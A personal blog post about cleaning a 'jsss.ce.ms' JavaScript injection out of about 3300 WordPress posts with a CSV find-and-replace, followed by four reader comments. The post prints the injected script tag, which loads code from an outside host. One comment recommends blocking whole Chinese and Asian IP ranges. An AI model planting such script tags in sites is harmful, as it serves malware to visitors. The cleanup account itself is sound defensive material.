How to clean an “jsss.ce.ms” SQL injection

Well, that was exciting.  Apparently my website had been attached by some kind of SQL injection.  I was curious if my self-hosted WordPress website had been attacked like 4,300 others.  After some digging around, I found that this was not the case.  A scan by UnmaskParasites.com revealed nothing unusual.  However, a scan by Sucuri’s SiteCheck revealed some Javascript malware entries in some posts.

I say “some” posts.  By this I mean 3300 posts and post revisions dating back to the very first blog entry on this website going to as recently as July 13, 2011.  Not including this post, I’ve got 721 published blog entries – with almost all containing this little gem:

<script type=”text/javascript” src=”http://jsss.ce.ms/16″></script><script type=”text/javascript” src=”http://jsss.ce.ms/16″></script>

Here’s what I did to clean this infection:

  • Copy my entire “_posts”  to “_posts2”
  • Copy my entire “_posts” to “_posts3”
  • Downloaded “_posts3” as a CSV
  • Find and replace all instances of the above script in the CSV with “”
  • Deleted the contents of “_posts3”
  • Uploaded the altered CSV into “_posts3”
  • Renamed “_posts” to “_posts1” and “_posts3” to “_posts”
  • Done!

It’s definitely possible to create a little WordPress plugin to clean this kind of an infection out, but there’s little incentive to do so when the manual fix is relatively easy.  If you’ve got this kind of an infection in your site and don’t know how to take care of it, drop me a line.

4 Responses to “How to clean an “jsss.ce.ms” SQL injection”

  1. MTO says:

    was your high resource usage related to this?

  2. MakerBlock says:

    @MTO: I honestly don’t know. I figure it couldn’t have been good, though. After fiddling with it, I discovered that it had infected my wife’s blog too! But, thankfully, I was able to clean it out relatively quickly this time.

  3. cyrozap says:

    I just scanned my website and it appears as though I was unaffected. Lately, though, I have seen a lot of attempted blog hijacking attempts. The majority of these attempts come from China and other Asian countries. To combat this, I added a ton of those IP ranges to my apache2.conf file. Go to this site for the blocklists: http://www.wizcrafts.net/chinese-blocklist.html

    Append all that to the end of your apache2.conf, httpd.conf, or .htaccess file and you’ll have a lot fewer hacking attempts.

  4. MakerBlock says:

    @Cyrozap: Awesome! Thanks man!